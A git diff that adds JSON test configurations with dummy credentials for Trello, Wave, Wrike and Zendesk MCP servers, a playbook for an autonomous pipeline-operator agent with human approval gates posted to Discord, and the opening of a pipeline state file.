"board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "all", + "fields": "test_value" + }, + "expect": "content && content.length > 0" + }, + "list_cards:empty-board_id": { + "args": { + "board_id": "", + "list_id": "test-id-123", + "filter": "all", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-list_id": { + "args": { + "board_id": "test-id-123", + "list_id": "", + "filter": "all", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-filter": { + "args": { + "board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "", + "fields": "test_value" + }, + "expect": "exists" + }, + "list_cards:empty-fields": { + "args": { + "board_id": "test-id-123", + "list_id": "test-id-123", + "filter": "all", + "fields": "" + }, + "expect": "exists" + }, + "get_card": { + "args": { + "card_id": "test-id-123", + "members": true, + "checklists": "all", + "attachments": true + }, + "expect": "content && content.length > 0" + }, + "get_card:empty-checklists": { + "args": { + "card_id": "test-id-123", + "members": true, + "checklists": "", + "attachments": true + }, + "expect": "exists" + }, + "create_card": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "content && content.length > 0" + }, + "create_card:empty-desc": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-pos": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-due": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "https://example.com" + }, + "expect": "exists" + }, + "create_card:empty-urlSource": { + "args": { + "list_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "pos": "test_value", + "due": "test_value", + "dueComplete": true, + "idMembers": [], + "idLabels": [], + "urlSource": "" + }, + "expect": "exists" + }, + "update_card": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "update_card:empty-name": { + "args": { + "card_id": "test-id-123", + "name": "", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-desc": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-due": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "", + "dueComplete": true, + "pos": "test_value" + }, + "expect": "exists" + }, + "update_card:empty-pos": { + "args": { + "card_id": "test-id-123", + "name": "Test Name", + "desc": "test_value", + "closed": true, + "due": "test_value", + "dueComplete": true, + "pos": "" + }, + "expect": "exists" + }, + "move_card": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "test-id-123", + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "move_card:empty-board_id": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "", + "pos": "test_value" + }, + "expect": "exists" + }, + "move_card:empty-pos": { + "args": { + "card_id": "test-id-123", + "list_id": "test-id-123", + "board_id": "test-id-123", + "pos": "" + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "card_id": "test-id-123", + "text": "Sample content for testing" + }, + "expect": "content && content.length > 0" + }, + "create_list": { + "args": { + "board_id": "test-id-123", + "name": "Test Name", + "pos": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_list:empty-pos": { + "args": { + "board_id": "test-id-123", + "name": "Test Name", + "pos": "" + }, + "expect": "exists" + }, + "archive_card": { + "args": { + "card_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "delete_card": { + "args": { + "card_id": "test-id-123" + }, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/trello.json b/factory-tools/test-configs/trello.json new file mode 100644 index 0000000..8b5d9fb --- /dev/null +++ b/factory-tools/test-configs/trello.json @@ -0,0 +1,12 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/trello/dist/index.js" + ], + "env": { + "TRELLO_API_KEY": "factory_discovery_dummy", + "TRELLO_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wave-tests.json b/factory-tools/test-configs/wave-tests.json new file mode 100644 index 0000000..c718a3c --- /dev/null +++ b/factory-tools/test-configs/wave-tests.json @@ -0,0 +1,336 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wave/dist/index.js" + ], + "env": { + "WAVE_API_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_businesses": { + "args": {}, + "expect": "content && content.length > 0" + }, + "list_invoices": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_invoice": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "test_value", + "items": [], + "memo": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_invoice:empty-invoiceDate": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "", + "dueDate": "test_value", + "items": [], + "memo": "test_value" + }, + "expect": "exists" + }, + "create_invoice:empty-dueDate": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "", + "items": [], + "memo": "test_value" + }, + "expect": "exists" + }, + "create_invoice:empty-memo": { + "args": { + "businessId": "test-id-123", + "customerId": "test-id-123", + "invoiceDate": "test_value", + "dueDate": "test_value", + "items": [], + "memo": "" + }, + "expect": "exists" + }, + "list_customers": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_customer": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "content && content.length > 0" + }, + "create_customer:empty-email": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-firstName": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-lastName": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-phone": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-addressLine1": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-addressLine2": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-city": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-provinceCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-postalCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "", + "countryCode": "javascript", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-countryCode": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "", + "currency": "test_value" + }, + "expect": "exists" + }, + "create_customer:empty-currency": { + "args": { + "businessId": "test-id-123", + "name": "Test Name", + "email": "test@example.com", + "firstName": "Test Name", + "lastName": "Test Name", + "phone": "test_value", + "addressLine1": "test_value", + "addressLine2": "test_value", + "city": "test_value", + "provinceCode": "javascript", + "postalCode": "javascript", + "countryCode": "javascript", + "currency": "" + }, + "expect": "exists" + }, + "list_accounts": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "list_transactions": { + "args": { + "businessId": "test-id-123", + "page": 50, + "pageSize": 50 + }, + "expect": "content && content.length > 0" + }, + "create_expense": { + "args": { + "businessId": "test-id-123", + "externalId": "test-id-123", + "date": "test_value", + "description": "test_value", + "anchor": {}, + "lineItems": [] + }, + "expect": "content && content.length > 0" + }, + "create_expense:empty-externalId": { + "args": { + "businessId": "test-id-123", + "externalId": "", + "date": "test_value", + "description": "test_value", + "anchor": {}, + "lineItems": [] + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wave.json b/factory-tools/test-configs/wave.json new file mode 100644 index 0000000..67667b9 --- /dev/null +++ b/factory-tools/test-configs/wave.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wave/dist/index.js" + ], + "env": { + "WAVE_API_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wrike-tests.json b/factory-tools/test-configs/wrike-tests.json new file mode 100644 index 0000000..7f54c3e --- /dev/null +++ b/factory-tools/test-configs/wrike-tests.json @@ -0,0 +1,251 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wrike/dist/index.js" + ], + "env": { + "WRIKE_ACCESS_TOKEN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tasks": { + "args": { + "folder_id": "test-id-123", + "status": "Active", + "limit": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tasks:empty-folder_id": { + "args": { + "folder_id": "", + "status": "Active", + "limit": 50 + }, + "expect": "exists" + }, + "list_tasks:empty-status": { + "args": { + "folder_id": "test-id-123", + "status": "", + "limit": 50 + }, + "expect": "exists" + }, + "get_task": { + "args": { + "task_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "create_task": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "content && content.length > 0" + }, + "create_task:empty-description": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-status": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-importance": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "", + "start_date": "test_value", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-start_date": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "", + "due_date": "test_value", + "responsibles": [] + }, + "expect": "exists" + }, + "create_task:empty-due_date": { + "args": { + "folder_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "", + "responsibles": [] + }, + "expect": "exists" + }, + "update_task": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "content && content.length > 0" + }, + "update_task:empty-title": { + "args": { + "task_id": "test-id-123", + "title": "", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-description": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-status": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "", + "importance": "High", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-importance": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "", + "start_date": "test_value", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-start_date": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "", + "due_date": "test_value", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "update_task:empty-due_date": { + "args": { + "task_id": "test-id-123", + "title": "test_value", + "description": "test_value", + "status": "Active", + "importance": "High", + "start_date": "test_value", + "due_date": "", + "add_responsibles": [], + "remove_responsibles": [] + }, + "expect": "exists" + }, + "list_folders": { + "args": { + "parent_folder_id": "test-id-123" + }, + "expect": "content && content.length > 0" + }, + "list_folders:empty-parent_folder_id": { + "args": { + "parent_folder_id": "" + }, + "expect": "exists" + }, + "list_projects": { + "args": {}, + "expect": "content && content.length > 0" + }, + "add_comment": { + "args": { + "task_id": "test-id-123", + "text": "Sample content for testing" + }, + "expect": "content && content.length > 0" + }, + "list_users": { + "args": {}, + "expect": "content && content.length > 0" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/wrike.json b/factory-tools/test-configs/wrike.json new file mode 100644 index 0000000..1d308ab --- /dev/null +++ b/factory-tools/test-configs/wrike.json @@ -0,0 +1,11 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/wrike/dist/index.js" + ], + "env": { + "WRIKE_ACCESS_TOKEN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/zendesk-tests.json b/factory-tools/test-configs/zendesk-tests.json new file mode 100644 index 0000000..255bcdd --- /dev/null +++ b/factory-tools/test-configs/zendesk-tests.json @@ -0,0 +1,266 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/zendesk/dist/index.js" + ], + "env": { + "ZENDESK_API_TOKEN": "factory_discovery_dummy", + "ZENDESK_EMAIL": "factory_discovery_dummy", + "ZENDESK_SUBDOMAIN": "factory_discovery_dummy" + } + }, + "tests": { + "tools": { + "list_tickets": { + "args": { + "status": "new", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_tickets:empty-status": { + "args": { + "status": "", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_tickets:empty-sort_by": { + "args": { + "status": "new", + "sort_by": "", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "list_tickets:empty-sort_order": { + "args": { + "status": "new", + "sort_by": "test_value", + "sort_order": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "get_ticket": { + "args": { + "ticket_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_ticket": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "content && content.length > 0" + }, + "create_ticket:empty-requester_email": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "", + "requester_name": "Test Name", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-requester_name": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "", + "priority": "urgent", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-priority": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "", + "type": "problem", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "create_ticket:empty-type": { + "args": { + "subject": "test_value", + "description": "test_value", + "requester_email": "test@example.com", + "requester_name": "Test Name", + "priority": "urgent", + "type": "", + "tags": [], + "assignee_id": 50, + "group_id": 50 + }, + "expect": "exists" + }, + "update_ticket": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "content && content.length > 0" + }, + "update_ticket:empty-status": { + "args": { + "ticket_id": 50, + "status": "", + "priority": "urgent", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-priority": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "", + "type": "problem", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-type": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "", + "subject": "test_value", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "update_ticket:empty-subject": { + "args": { + "ticket_id": 50, + "status": "new", + "priority": "urgent", + "type": "problem", + "subject": "", + "assignee_id": 50, + "group_id": 50, + "tags": [], + "additional_tags": [], + "remove_tags": [] + }, + "expect": "exists" + }, + "add_comment": { + "args": { + "ticket_id": 50, + "body": "test_value", + "public": true, + "author_id": 50 + }, + "expect": "content && content.length > 0" + }, + "list_users": { + "args": { + "role": "end-user", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "list_users:empty-role": { + "args": { + "role": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets": { + "args": { + "query": "test query", + "sort_by": "test_value", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "content && content.length > 0" + }, + "search_tickets:empty-sort_by": { + "args": { + "query": "test query", + "sort_by": "", + "sort_order": "asc", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + }, + "search_tickets:empty-sort_order": { + "args": { + "query": "test query", + "sort_by": "test_value", + "sort_order": "", + "page": 50, + "per_page": 50 + }, + "expect": "exists" + } + }, + "resources": {}, + "prompts": {}, + "timeout": 30000 + } +} \ No newline at end of file diff --git a/factory-tools/test-configs/zendesk.json b/factory-tools/test-configs/zendesk.json new file mode 100644 index 0000000..047618e --- /dev/null +++ b/factory-tools/test-configs/zendesk.json @@ -0,0 +1,13 @@ +{ + "server": { + "command": "node", + "args": [ + "/Users/jakeshore/.clawdbot/workspace/mcp-diagrams/mcp-servers/zendesk/dist/index.js" + ], + "env": { + "ZENDESK_API_TOKEN": "factory_discovery_dummy", + "ZENDESK_EMAIL": "factory_discovery_dummy", + "ZENDESK_SUBDOMAIN": "factory_discovery_dummy" + } + } +} \ No newline at end of file diff --git a/manim-mcp b/manim-mcp new file mode 160000 index 0000000..983d5a0 --- /dev/null +++ b/manim-mcp @@ -0,0 +1 @@ +Subproject commit 983d5a0ef49de31147b29375909d7887854f65e0 diff --git a/mcp-command-center/PIPELINE-OPERATOR.md b/mcp-command-center/PIPELINE-OPERATOR.md new file mode 100644 index 0000000..90d31f1 --- /dev/null +++ b/mcp-command-center/PIPELINE-OPERATOR.md @@ -0,0 +1,118 @@ +# MCP Pipeline Operator — Buba's Playbook + +## Role +I (Buba) am the autonomous pipeline operator for all MCP server development. I read and write `state.json` as the source of truth, post to Discord channels for decisions and updates, and do the actual work of advancing MCPs through the 25-stage lifecycle. + +## State File +- **Path:** `/Users/jakeshore/.clawdbot/workspace/mcp-command-center/state.json` +- **Dashboard:** `/Users/jakeshore/.clawdbot/workspace/mcp-command-center/index.html` +- Read state.json to know where every MCP is +- Write state.json after advancing any card +- The dashboard reads state.json for display + +## Discord Channel Map +| Channel | ID | Purpose | +|---------|-----|---------| +| #pipeline-decisions | 1468757982140567676 | Go/no-go, architecture, publishing approvals | +| #design-reviews | 1468757983428083762 | Mockup + screenshot approval (Stage 7) | +| #pipeline-standup | 1468757984384389234 | Daily standup post | +| #build-log | 1468757986422820864 | Every card movement, build result | +| #blockers | 1468757987412938945 | Stuck MCPs, escalations | +| #mcp-strategy | 1468757988448669829 | Strategy discussions | +| #shipped | 1468757989497507870 | Production launches, wins | + +## Autonomy Rules + +### Auto-Advance (no approval needed) +Stages: 1→2, 2→3, 3→4 (if research looks good), 5→6, 6→7, 8→9, 9→10, 10→11, 11→12, 12→13, 13→14 + +For each: do the work, update state.json, post to #build-log. + +### Human-in-the-Loop (must get Jake's approval) +| Stage | Decision | Channel | Reaction Format | +|-------|----------|---------|----------------| +| 4 (Architecture) | Tool list + app plan approval | #pipeline-decisions | ✅ approve / ❌ rethink / 💬 discuss | +| 7a (Design Mockups) | Nano Banana Pro mockup approval | #design-reviews | ✅ build it / ✏️ changes / ❌ scrap | +| 7c (Final Screenshots) | Built app screenshot approval | #design-reviews | ✅ ship it / ✏️ tweaks / 🔄 rebuild | +| 15 (GitHub Publish) | Publishing approval | #pipeline-decisions | ✅ publish / ❌ hold | +| 16 (Registry Listed) | Registry listing approval | #pipeline-decisions | ✅ list it / ❌ hold | +| 22-24 (Monetization) | Pricing/enterprise decisions | #pipeline-decisions | ✅ / ❌ / 💬 | + +### Stage 7 Special Flow (Two-Gate Visual Approval) +``` +7a: Generate mockup with Nano Banana Pro → post to #design-reviews → wait for ✅ +7b: Build the app (autonomous after mockup approved) +7c: Screenshot real app → post to #design-reviews with mockup comparison → wait for ✅ +Only then advance to Stage 8 +``` + +### Blocker Protocol +1. Hit a problem → try to fix it (up to 2 attempts) +2. If still stuck → flag as blocked in state.json +3. Post to #blockers with details +4. Ping Jake if critical + +## Daily Standup Format +Post to #pipeline-standup at 9:00 AM ET: +``` +**MCP PIPELINE STANDUP — [Date]** + +**Overnight Progress:** +• [MCP Name]: Stage X → Stage Y (reason) +• [MCP Name]: BLOCKED — [issue] + +**Pipeline Stats:** +• Total: X | Build: X | Testing: X | Docs: X | Shipped: X | Blocked: X +• Velocity: X stage advances in last 7 days + +**Decisions Waiting:** +• [MCP Name] — [what decision] (posted [when]) + +**Today's Plan:** +• [what I'll work on] +``` + +## Build Log Format +Post to #build-log on every card movement: +``` +[HH:MM] **[MCP Name]** Stage X → Stage Y +> [brief description of what was done] +``` + +## Decision Request Format +Post to #pipeline-decisions: +``` +**DECISION NEEDED** + +**MCP:** [Name] +**Stage:** [Current] → [Proposed next] +**Context:** [What I found / built / recommend] +**Recommendation:** [My take] + +React: ✅ approve | ❌ reject | 💬 discuss +``` + +## Design Review Format +Post to #design-reviews: +``` +**[MOCKUP/SCREENSHOT] REVIEW — [MCP Name]** +**App [X/Y]:** [App Name] + +[Image] + +**Layout:** [description] +**Components:** [list] +**Interactivity:** [what's interactive] + +React: ✅ approve | ✏️ changes needed | ❌ scrap +``` + +## Heartbeat Check (Cron) +Every 60 minutes: +1. Read state.json +2. For each MCP not blocked: + - Can it auto-advance? → Do the work + - Waiting for decision? → Check if Jake reacted (re-ping if >24h) + - In a work stage? → Continue/start the work +3. Write updated state.json +4. Post any movements to #build-log diff --git a/mcp-command-center/index.html b/mcp-command-center/index.html new file mode 100644 index 0000000..925fb36 --- /dev/null +++ b/mcp-command-center/index.html @@ -0,0 +1,1350 @@ + + + + + +MCP Command Center + + + + + + +
+ + + diff --git a/mcp-command-center/state.json b/mcp-command-center/state.json new file mode 100644 index 0000000..1c76122 --- /dev/null +++ b/mcp-command-center/state.json @@ -0,0 +1,121 @@ +{ + "version": 1, + "lastUpdated": "2026-02-05T01:00:00Z", + "updatedBy": "buba-heartbeat", + "phases": [ + { "id": 1, "name": "Discovery & Research", "color": "#3B82F6", "stages": [1,2,3,4] }, + { "id": 2, "name": "Build", "color": "#8B5CF6", "stages": [5,6,7,8] }, + { "id": 3, "name": "Testing & Hardening", "color": "#F59E0B", "stages": [9,10,11,12] }, + { "id": 4, "name": "Documentation & Packaging", "color": "#14B8A6", "stages": [13,14,15] }, + { "id": 5, "name": "Launch & Distribution", "color": "#F43F5E", "stages": [16,17,18] }, + { "id": 6, "name": "Adoption & Feedback", "color": "#10B981", "stages": [19,20,21] }, + { "id": 7, "name": "Monetization & Scale", "color": "#EAB308", "stages": [22,23,24,25] } + ], + "stages": [ + { "id": 1, "name": "Identified", "phase": 1 }, + { "id": 2, "name": "Market Research", "phase": 1 }, + { "id": 3, "name": "API Research", "phase": 1 }, + { "id": 4, "name": "Architecture Designed", "phase": 1 }, + { "id": 5, "name": "Server Scaffolded", "phase": 2 }, + { "id": 6, "name": "Core Tools Built", "phase": 2 }, + { "id": 7, "name": "UI Apps Built", "phase": 2, "gates": ["design-mockup-approval", "final-screenshot-approval"] }, + { "id": 8, "name": "Integration Complete", "phase": 2 }, + { "id": 9, "name": "Local Testing", "phase": 3 }, + { "id": 10, "name": "Edge Case Testing", "phase": 3 }, + { "id": 11, "name": "Host Compatibility Testing", "phase": 3 }, + { "id": 12, "name": "Performance Validated", "phase": 3 }, + { "id": 13, "name": "README Written", "phase": 4 }, + { "id": 14, "name": "Package Prepared", "phase": 4 }, + { "id": 15, "name": "GitHub Repo Published", "phase": 4 }, + { "id": 16, "name": "Registry Listed", "phase": 5 }, + { "id": 17, "name": "Launch Marketing", "phase": 5 }, + { "id": 18, "name": "Content Marketing", "phase": 5 }, + { "id": 19, "name": "Early Adopter Feedback", "phase": 6 }, + { "id": 20, "name": "Iteration Cycle", "phase": 6 }, + { "id": 21, "name": "Community Building", "phase": 6 }, + { "id": 22, "name": "Freemium/Pro Strategy", "phase": 7 }, + { "id": 23, "name": "Enterprise Outreach", "phase": 7 }, + { "id": 24, "name": "Enterprise Deals", "phase": 7 }, + { "id": 25, "name": "Raving Fans", "phase": 7 } + ], + "mcps": [ + { "id": "closebot", "name": "CloseBot MCP", "type": "BIG4", "stage": 8, "tools": 119, "apps": 6, "modules": 14, "blocked": false, "blockerNote": "", "notes": "119 tools, 14 modules, 6 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "meta-ads", "name": "Meta Ads MCP", "type": "BIG4", "stage": 8, "tools": 55, "apps": 11, "blocked": false, "blockerNote": "", "notes": "~55 tools, 11 categories, 11 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "google-console", "name": "Google Console MCP", "type": "BIG4", "stage": 8, "tools": 22, "apps": 5, "blocked": 